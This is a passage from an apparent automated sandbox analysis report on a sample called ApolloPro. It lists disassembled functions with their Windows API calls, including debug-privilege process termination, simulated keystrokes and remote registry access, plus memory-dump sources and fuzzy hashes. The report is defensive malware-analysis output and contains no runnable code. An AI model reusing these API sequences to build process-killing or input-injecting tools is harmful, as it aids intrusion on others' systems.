                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0068A290
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0068A299
                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0068A2B0
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0068A2B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2014098862-0
                                                                                              • Opcode ID: 9080cb5a42825d60e135148fb310dde3581d72d436f3cef02aa35c78f4018af7
                                                                                              • Instruction ID: 77c4b06219d9ec0e0a7b046a8bba0c32c13a83ad1ccb8f91452cdfec8962d087
                                                                                              • Opcode Fuzzy Hash: 9080cb5a42825d60e135148fb310dde3581d72d436f3cef02aa35c78f4018af7
                                                                                              • Instruction Fuzzy Hash: 6411CEB1950218BEF7206FA5DC8AF7A7A2EEB4C750F112519F6406B090CAF35C509BA4
                                                                                              Function 006894D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0068915A,00000B00,?,?), ref: 006894E2
                                                                                              • HeapAlloc.KERNEL32(00000000,?,0068915A,00000B00,?,?), ref: 006894E9
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0068915A,00000B00,?,?), ref: 006894FE
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0068915A,00000B00,?,?), ref: 00689506
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0068915A,00000B00,?,?), ref: 00689509
                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0068915A,00000B00,?,?), ref: 00689519
                                                                                              • GetCurrentProcess.KERNEL32(0068915A,00000000,?,0068915A,00000B00,?,?), ref: 00689521
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0068915A,00000B00,?,?), ref: 00689524
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0068954A,00000000,00000000,00000000), ref: 0068953E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: b29a1d5088f01057c4bbc9031a3a3af03a00a5f9e7de73359a12e06068982f97
                                                                                              • Instruction ID: c1d195d3a2b5afee3d7ad1042e3d7eee9a4baa25c91440f7e797770fc8351c9b
                                                                                              • Opcode Fuzzy Hash: b29a1d5088f01057c4bbc9031a3a3af03a00a5f9e7de73359a12e06068982f97
                                                                                              • Instruction Fuzzy Hash: 0B01B6B5240308FFF710ABA5DC4DF6B7BADEB89711F059411FA05DB2A1CA749800CB20
                                                                                              Function 006AA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                              • API String ID: 0-572801152
                                                                                              • Opcode ID: a385a5829f6e604eef18f7b55339d230e1bc96766684ed5c618c9e94558c8ecf
                                                                                              • Instruction ID: 00a0222ace0f4fa04ee3abd4c5756d1880f3e8268965f498ae5b5b934621b28a
                                                                                              • Opcode Fuzzy Hash: a385a5829f6e604eef18f7b55339d230e1bc96766684ed5c618c9e94558c8ecf
                                                                                              • Instruction Fuzzy Hash: 1EC17F71A0021A9BDF14EFA8C884AEEB7F6FB49314F14856AE905AB380E7709D45CF51
                                                                                              Function 006A97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 2862541840-625585964
                                                                                              • Opcode ID: 79c4ad176a1446544b14e7b7dbc18d8ee68d24fbd9d6c19913a299b4697106b7
                                                                                              • Instruction ID: 2bf398631e70b07febc5da9b0cb349563518058502e78f727918e3326f5f16fd
                                                                                              • Opcode Fuzzy Hash: 79c4ad176a1446544b14e7b7dbc18d8ee68d24fbd9d6c19913a299b4697106b7
                                                                                              • Instruction Fuzzy Hash: 2D917B30A00219ABDF24EFA5C844FAFBBBAEF46710F24855EE515AB241D7709D45CFA0
                                                                                              Function 006A9E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00687D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?,?,00688073), ref: 00687D45
                                                                                                • Part of subcall function 00687D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D60
                                                                                                • Part of subcall function 00687D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D6E
                                                                                                • Part of subcall function 00687D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?), ref: 00687D7E
                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 006A9EF0
                                                                                              • _memset.LIBCMT ref: 006A9EFD
                                                                                              • _memset.LIBCMT ref: 006AA040
                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 006AA06C
                                                                                              • CoTaskMemFree.OLE32(?), ref: 006AA077
                                                                                              Strings
                                                                                              • NULL Pointer assignment, xrefs: 006AA0C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                              • String ID: NULL Pointer assignment
                                                                                              • API String ID: 1300414916-2785691316
                                                                                              • Opcode ID: d0647ddc73fa66e8b9967cd272ade0829e272f7c28016237446930fbfeda3b28
                                                                                              • Instruction ID: c653126da82a4d6be332f4bcb2ec4b2bb6018f791df9bcb78eaea699ab42cad1
                                                                                              • Opcode Fuzzy Hash: d0647ddc73fa66e8b9967cd272ade0829e272f7c28016237446930fbfeda3b28
                                                                                              • Instruction Fuzzy Hash: 8C912971D00229EBDB20EFA4DC95EDEBBBAEF09310F20815AF515A7241DB715A45CFA0
                                                                                              Function 006B73A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006B7449
                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 006B745D
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006B7477
                                                                                              • _wcscat.LIBCMT ref: 006B74D2
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 006B74E9
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006B7517
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 307300125-78025650
                                                                                              • Opcode ID: d9b5004c8ba7863bda0b04ca2ba8b56f3a3f18791e9505b46bef1ef3185f7724
                                                                                              • Instruction ID: 4e9415c2a5eded76c49263a62e0cdb32f5be797171fec14a58f9a277731ed022
                                                                                              • Opcode Fuzzy Hash: d9b5004c8ba7863bda0b04ca2ba8b56f3a3f18791e9505b46bef1ef3185f7724
                                                                                              • Instruction Fuzzy Hash: F64193B1A04348AFEB219F64CC85FEE7BEAEF48350F10452AF985A7291D6719D84CB50
                                                                                              Function 006AF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00694148: CreateToolhelp32Snapshot.KERNEL32 ref: 0069416D
                                                                                                • Part of subcall function 00694148: Process32FirstW.KERNEL32(00000000,?), ref: 0069417B
                                                                                                • Part of subcall function 00694148: CloseHandle.KERNELBASE(00000000), ref: 00694245
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006AF08D
                                                                                              • GetLastError.KERNEL32 ref: 006AF0A0
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006AF0CF
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 006AF14C
                                                                                              • GetLastError.KERNEL32(00000000), ref: 006AF157
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 006AF18C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 2533919879-2896544425
                                                                                              • Opcode ID: f3a7113129b45a2dabf6c296089bf8d18a2944f39e6110df6bc2b91788fd9814
                                                                                              • Instruction ID: f662c494f231955febe3cbb7f18ff1893872f02cb99f47c301b07c85ba8ae336
                                                                                              • Opcode Fuzzy Hash: f3a7113129b45a2dabf6c296089bf8d18a2944f39e6110df6bc2b91788fd9814
                                                                                              • Instruction Fuzzy Hash: 4341B9302002019FDB21EF64CC95FADB7A6AF84714F18841CF8468B392DBB4AC05CF9A
                                                                                              Function 006947E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00694802
                                                                                              • LoadStringW.USER32(00000000), ref: 00694809
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0069481F
                                                                                              • LoadStringW.USER32(00000000), ref: 00694826
                                                                                              • _wprintf.LIBCMT ref: 0069484C
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0069486A
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00694847
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 3648134473-3128320259
                                                                                              • Opcode ID: 0675cdaadfcc5abb57b1b3765e7d04b2bd5fc5e98feb75765c071a31b0b6cfd7
                                                                                              • Instruction ID: 6577a12756148c6b61a22c1ce721e6e6b0876818d2f49589b1259a81c97b8dab
                                                                                              • Opcode Fuzzy Hash: 0675cdaadfcc5abb57b1b3765e7d04b2bd5fc5e98feb75765c071a31b0b6cfd7
                                                                                              • Instruction Fuzzy Hash: E70162F2900348BFFB519BA09D89EF6776EE708301F400596BB49E2141EA749E858B75
                                                                                              Function 006BDB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 006BDB42
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 006BDB62
                                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006BDD9D
                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006BDDBB
                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006BDDDC
                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 006BDDFB
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 006BDE20
                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 006BDE43
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                              • String ID:
                                                                                              • API String ID: 1211466189-0
                                                                                              • Opcode ID: 644d2bc78430758b9ae7687d148be48433b4de616c4348ff8339affd1d2615b2
                                                                                              • Instruction ID: cff08de98205395d6435d5764061f6d6a4b3f41f140febf74ecd005bc2ae925e
                                                                                              • Opcode Fuzzy Hash: 644d2bc78430758b9ae7687d148be48433b4de616c4348ff8339affd1d2615b2
                                                                                              • Instruction Fuzzy Hash: B9B178B1600215EBDF14CF69C985BFD7BB2BF44701F088069EC48AE295E775A991CBA0
                                                                                              Function 006B0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 006B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B044E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3479070676-0
                                                                                              • Opcode ID: 76097c757d9a1da9436acfbc0584076b9187bfa25459daa533ff32cbbfa3e7d4
                                                                                              • Instruction ID: 0c19eb11438ae138169c005b6efc153219bfe6d906907e2e939a69374bf6cf7a
                                                                                              • Opcode Fuzzy Hash: 76097c757d9a1da9436acfbc0584076b9187bfa25459daa533ff32cbbfa3e7d4
                                                                                              • Instruction Fuzzy Hash: C2A1AD70204201DFDB50EF24C895FAEBBE6AF84314F14891CF5968B292DB35E985CF46
                                                                                              Function 00632E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0066C508,00000004,00000000,00000000,00000000), ref: 00632E9F
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0066C508,00000004,00000000,00000000,00000000,000000FF), ref: 00632EE7
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0066C508,00000004,00000000,00000000,00000000), ref: 0066C55B
                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0066C508,00000004,00000000,00000000,00000000), ref: 0066C5C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: b59b1f00a7850bfa6464392a3c7bb53a0bacfe9aef41597afcefb762f5c59691
                                                                                              • Instruction ID: 3d6bbfe7ffa08dd51a12ece17c795dafecd5b2ed4ee39516c2584970cb72d645
                                                                                              • Opcode Fuzzy Hash: b59b1f00a7850bfa6464392a3c7bb53a0bacfe9aef41597afcefb762f5c59691
                                                                                              • Instruction Fuzzy Hash: 1C411A30608B82DED7358B29CCAABBA7B93EB81310F24440DE49746761C770F851D7A0
                                                                                              Function 006B67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 006B6810
                                                                                              • GetDC.USER32(00000000), ref: 006B6818
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006B6823
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 006B682F
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006B686B
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006B687C
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006B964F,?,?,000000FF,00000000,?,000000FF,?), ref: 006B68B6
                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006B68D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3864802216-0
                                                                                              • Opcode ID: 27c694781a4e50431d9e6e85b964a89049899d555c83c895147948dab1e4bf6b
                                                                                              • Instruction ID: 38f8269d456834d04fe5985f714581dbd3561a47a415493d33b77a329c579ba8
                                                                                              • Opcode Fuzzy Hash: 27c694781a4e50431d9e6e85b964a89049899d555c83c895147948dab1e4bf6b
                                                                                              • Instruction Fuzzy Hash: 74316D72201214BFEB118F50CC4AFFA3BAAEB49761F044065FE089A291C6759851CB74
                                                                                              Function 0068C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: c9fddb5a10a5e71c1c8c2683c8ef81a092f1135692fcd4ad43db7b346903d7e2
                                                                                              • Instruction ID: fd6f87ce95cbe76a791733b6eec1474bdc064697d7294d18143fb9e8b6212422
                                                                                              • Opcode Fuzzy Hash: c9fddb5a10a5e71c1c8c2683c8ef81a092f1135692fcd4ad43db7b346903d7e2
                                                                                              • Instruction Fuzzy Hash: 3E21D7B26416157AD20475219D82FFF376FDE257A4F044228FD06AA342E730DE1587B5
                                                                                              Function 0069F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                                • Part of subcall function 0064436A: _wcscpy.LIBCMT ref: 0064438D
                                                                                              • _wcstok.LIBCMT ref: 0069F2D7
                                                                                              • _wcscpy.LIBCMT ref: 0069F366
                                                                                              • _memset.LIBCMT ref: 0069F399
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
